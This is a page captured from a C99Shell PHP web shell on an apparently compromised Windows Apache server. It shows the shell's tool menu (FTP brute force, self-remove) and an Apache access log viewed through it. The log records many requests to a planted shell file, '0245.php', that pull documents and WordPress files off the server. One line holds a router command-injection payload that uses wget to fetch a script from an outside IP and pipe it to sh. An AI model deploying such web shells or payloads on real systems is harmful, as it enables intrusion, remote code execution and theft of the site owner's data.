!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\apache\logs\   drwxrwxrwx
Free 5.02 GB of 239.26 GB (2.1%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     access.2024.06.21.log (4.19 MB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
172.22.2.4 - - [20/Jun/2024:23:58:20 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
201.245.192.253 - - [21/Jun/2024:00:00:07 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [21/Jun/2024:00:00:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [21/Jun/2024:00:00:35 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.109.28 - - [21/Jun/2024:00:00:35 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+301-350&f=00000335.tif&ft=download HTTP/1.1" 200 122060
201.245.192.253 - - [21/Jun/2024:00:01:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.127.63 - - [21/Jun/2024:00:01:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=5407.pdf&ft=notepad&white=1 HTTP/1.1" 200 368329
3.12.251.153 - - [21/Jun/2024:00:01:32 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Jun/2024:00:02:07 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [21/Jun/2024:00:02:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.42.102 - - [21/Jun/2024:00:02:28 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes%5Cjs%5Cthickbox&f=loadingAnimation.gif&ft=download HTTP/1.1" 200 15238
201.245.192.253 - - [21/Jun/2024:00:02:35 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [21/Jun/2024:00:03:19 -0500] "HEAD / HTTP/1.1" 200 -
47.128.123.82 - - [21/Jun/2024:00:03:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5C&f=0059.pdf&ft=img&white=1 HTTP/1.1" 200 196972
201.245.192.253 - - [21/Jun/2024:00:03:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
18.116.205.62 - - [21/Jun/2024:00:03:27 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Jun/2024:00:03:47 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38395
201.245.192.253 - - [21/Jun/2024:00:04:07 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.49.119 - - [21/Jun/2024:00:04:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Ctmp&f=phpD1D0.tmp&ft=download HTTP/1.1" 200 446115
201.245.192.253 - - [21/Jun/2024:00:04:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [21/Jun/2024:00:04:35 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [21/Jun/2024:00:03:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.38.90 - - [21/Jun/2024:00:05:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=5773.pdf&ft=download&white=1 HTTP/1.1" 200 360103
201.245.192.253 - - [21/Jun/2024:00:05:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.19 - - [21/Jun/2024:00:05:35 -0500] "GET /BLA/resoluciones/AUTOS%202009/2019.pdf HTTP/1.1" 200 100465
172.22.2.4 - - [21/Jun/2024:00:04:10 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58720
201.245.192.253 - - [21/Jun/2024:00:06:07 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.28.126 - - [21/Jun/2024:00:06:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=0846.pdf&ft=img&white=1 HTTP/1.1" 200 704271
201.245.192.253 - - [21/Jun/2024:00:06:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [21/Jun/2024:00:06:35 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.110.217 - - [21/Jun/2024:00:07:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+1251-1300&f=00001252.tif&ft=download HTTP/1.1" 200 120690
3.12.251.153 - - [21/Jun/2024:00:07:17 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Jun/2024:00:07:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.109.91 - - [21/Jun/2024:00:08:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-includes&f=compat.php&ft=download HTTP/1.1" 200 7554
201.245.192.253 - - [21/Jun/2024:00:08:07 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
207.46.13.151 - - [21/Jun/2024:00:08:18 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2002%2FRES+2002+1151-1200%2F HTTP/1.1" 200 12144
216.245.221.92 - - [21/Jun/2024:00:08:19 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Jun/2024:00:08:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [21/Jun/2024:00:08:35 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [21/Jun/2024:00:08:45 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38395
47.128.25.196 - - [21/Jun/2024:00:09:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+201-250%5C&f=00000205.tif&white=1 HTTP/1.1" 200 41912
3.20.63.178 - - [21/Jun/2024:00:09:14 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [21/Jun/2024:00:07:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60730
201.245.192.253 - - [21/Jun/2024:00:09:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [21/Jun/2024:00:09:34 -0500] "GET /robots.txt HTTP/1.1" 404 1018
47.128.29.196 - - [21/Jun/2024:00:10:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=5863.pdf&ft=download HTTP/1.1" 200 573095
201.245.192.253 - - [21/Jun/2024:00:10:07 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
152.61.192.232 - - [21/Jun/2024:00:10:14 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [21/Jun/2024:00:10:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [21/Jun/2024:00:10:35 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [21/Jun/2024:00:09:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.57.55 - - [21/Jun/2024:00:10:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1565.pdf&ft=img&white=1 HTTP/1.1" 200 560911
66.249.66.37 - - [21/Jun/2024:00:11:01 -0500] "GET /elabora-tu-jardin-vertical-y-contribuye-a-mitigar-los-efectos-del-cambio-climatico.html HTTP/1.1" 304 -
201.245.192.253 - - [21/Jun/2024:00:11:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [21/Jun/2024:00:10:00 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 48027
47.128.127.108 - - [21/Jun/2024:00:11:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+201-250%5C&f=00000201.tif&ft=img&white=1 HTTP/1.1" 200 66468
201.245.192.253 - - [21/Jun/2024:00:12:07 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [21/Jun/2024:00:12:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [21/Jun/2024:00:12:35 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.119.165 - - [21/Jun/2024:00:12:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4342.pdf&ft=notepad&white=1 HTTP/1.1" 200 20169
35.166.228.98 - - [21/Jun/2024:00:12:55 -0500] "HEAD / HTTP/1.1" 200 -
216.245.221.92 - - [21/Jun/2024:00:13:19 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Jun/2024:00:13:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
185.191.127.212 - - [21/Jun/2024:00:13:37 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.28.141%2Ft+-O-+|+sh%60) HTTP/1.1" 404 1018
47.128.99.72 - - [21/Jun/2024:00:13:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cbogotacumbredelclima%5Cwp-admin%5C&f=network.php&ft=download HTTP/1.1" 200 26630
201.245.192.253 - - [21/Jun/2024:00:13:44 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38395
201.245.192.253 - - [21/Jun/2024:00:14:07 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [21/Jun/2024:00:14:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
44.227.38.253 - - [21/Jun/2024:00:14:34 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Jun/2024:00:14:35 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.19.18 - - [21/Jun/2024:00:14:39 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CMercuryMail%5CDEFAULTS&f=personal.pmr&ft=download HTTP/1.1" 200 586
201.245.192.253 - - [21/Jun/2024:00:15:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.99.78 - - [21/Jun/2024:00:15:35 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes%5Cjs%5C&f=json2.min.js&ft=download&white=1 HTTP/1.1" 200 2950
201.245.192.253 - - [21/Jun/2024:00:16:07 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [21/Jun/2024:00:16:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.119.17 - - [21/Jun/2024:00:16:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Csig%5CGesti%F3n+Ambiental&f=126PM03-PR26.pdf&ft=download HTTP/1.1" 200 269983
201.245.192.253 - - [21/Jun/2024:00:16:35 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [21/Jun/2024:00:14:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
52.167.144.174 - - [21/Jun/2024:00:16:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/0015.pdf HTTP/1.1" 200 119741
172.22.2.4 - - [21/Jun/2024:00:17:01 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9738
201.245.192.253 - - [21/Jun/2024:00:17:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.118.20 - - [21/Jun/2024:00:17:28 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=5878.pdf&ft=img&white=1 HTTP/1.1" 200 392975
172.22.2.4 - - [21/Jun/2024:00:15:50 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
201.245.192.253 - - [21/Jun/2024:00:17:35 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35908
201.245.192.253 - - [21/Jun/2024:00:17:38 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33326
201.245.192.253 - - [21/Jun/2024:00:18:07 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [21/Jun/2024:00:18:19 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Jun/2024:00:18:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.22.164 - - [21/Jun/2024:00:18:24 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+301-350&f=00000332.tif&ft=download HTTP/1.1" 200 405155
201.245.192.253 - - [21/Jun/2024:00:18:35 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [21/Jun/2024:00:18:42 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38395
52.22.236.30 - - [21/Jun/2024:00:18:45 -0500] "HEAD / HTTP/1.1" 200 -
52.167.144.174 - - [21/Jun/2024:00:19:13 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones%2FRESOLUCIONES+2018%2F HTTP/1.1" 200 19727
47.128.118.56 - - [21/Jun/2024:00:19:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+1001-1050&f=00001028.tif&ft=download HTTP/1.1" 200 87352
201.245.192.253 - - [21/Jun/2024:00:19:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [21/Jun/2024:00:19:38 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36705
201.245.192.253 - - [21/Jun/2024:00:20:07 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.27.80 - - [21/Jun/2024:00:20:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5C&f=0930.tif&ft=notepad&white=1 HTTP/1.1" 200 120528
201.245.192.253 - - [21/Jun/2024:00:20:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
44.227.38.253 - - [21/Jun/2024:00:20:25 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Jun/2024:00:20:25 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33326
201.245.192.253 - - [21/Jun/2024:00:20:35 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
152.42.245.98 - - [21/Jun/2024:00:20:51 -0500] "CONNECT cloudflare.com:443 HTTP/1.1" 405 942
47.128.47.193 - - [21/Jun/2024:00:21:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4114.pdf&ft=img&white=1 HTTP/1.1" 200 380687
201.245.192.253 - - [21/Jun/2024:00:21:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [21/Jun/2024:00:22:07 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.126.88 - - [21/Jun/2024:00:22:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cvideos%5C&f=NuestraGente_Conociendoelparaiso.flv&ft=img&white=1 HTTP/1.1" 200 4161295
201.245.192.253 - - [21/Jun/2024:00:22:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [21/Jun/2024:00:20:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [21/Jun/2024:00:22:35 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.127.134 - - [21/Jun/2024:00:23:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2953.pdf&ft=img&white=1 HTTP/1.1" 200 3186447
216.245.221.92 - - [21/Jun/2024:00:23:19 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [21/Jun/2024:00:21:40 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
201.245.192.253 - - [21/Jun/2024:00:23:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [21/Jun/2024:00:23:41 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38395
47.128.127.105 - - [21/Jun/2024:00:24:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-includes%5CSimplePie&f=Rating.php&ft=download HTTP/1.1" 200 3451
201.245.192.253 - - [21/Jun/2024:00:24:07 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [21/Jun/2024:00:24:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
54.167.223.174 - - [21/Jun/2024:00:24:35 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Jun/2024:00:24:35 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.125.99 - - [21/Jun/2024:00:24:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes%5Cjs%5C&f=swfobject.js&ft=download&white=1 HTTP/1.1" 200 10231
201.245.192.253 - - [21/Jun/2024:00:25:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.127.126 - - [21/Jun/2024:00:25:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=6383.pdf&ft=download&white=1 HTTP/1.1" 200 20135
201.245.192.253 - - [21/Jun/2024:00:26:07 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
54.167.223.174 - - [21/Jun/2024:00:26:17 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Jun/2024:00:26:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [21/Jun/2024:00:26:35 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
162.55.37.179 - - [21/Jun/2024:00:26:39 -0500] "GET / HTTP/1.1" 200 4720
47.128.27.237 - - [21/Jun/2024:00:26:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-admin&f=user-new.php&ft=download HTTP/1.1" 200 18635
201.245.192.253 - - [21/Jun/2024:00:27:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [21/Jun/2024:00:27:35 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35908
201.245.192.253 - - [21/Jun/2024:00:27:40 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33326
47.128.120.189 - - [21/Jun/2024:00:27:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+2001-2050%5C&f=00002035.tif&white=1 HTTP/1.1" 200 198390
13.91.166.30 - - [21/Jun/2024:00:27:56 -0500] "GET /portal/redlion HTTP/1.1" 404 1018
141.98.11.79 - - [21/Jun/2024:00:27:58 -0500] "CONNECT google.com:443 HTTP/1.1" 405 938
201.245.192.253 - - [21/Jun/2024:00:28:07 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [21/Jun/2024:00:28:19 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [21/Jun/2024:00:26:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [21/Jun/2024:00:28:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [21/Jun/2024:00:28:35 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [21/Jun/2024:00:28:40 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38395
47.128.112.159 - - [21/Jun/2024:00:28:43 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2988.pdf&ft=download&white=1 HTTP/1.1" 200 396967
172.22.2.4 - - [21/Jun/2024:00:27:30 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59967
201.245.192.253 - - [21/Jun/2024:00:29:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [21/Jun/2024:00:29:38 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36705
47.128.43.119 - - [21/Jun/2024:00:29:39 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+2451-2500&f=00002464.tif&ft=download HTTP/1.1" 200 20131
201.245.192.253 - - [21/Jun/2024:00:30:07 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
3.20.63.178 - - [21/Jun/2024:00:30:20 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Jun/2024:00:30:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [21/Jun/2024:00:30:23 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33326
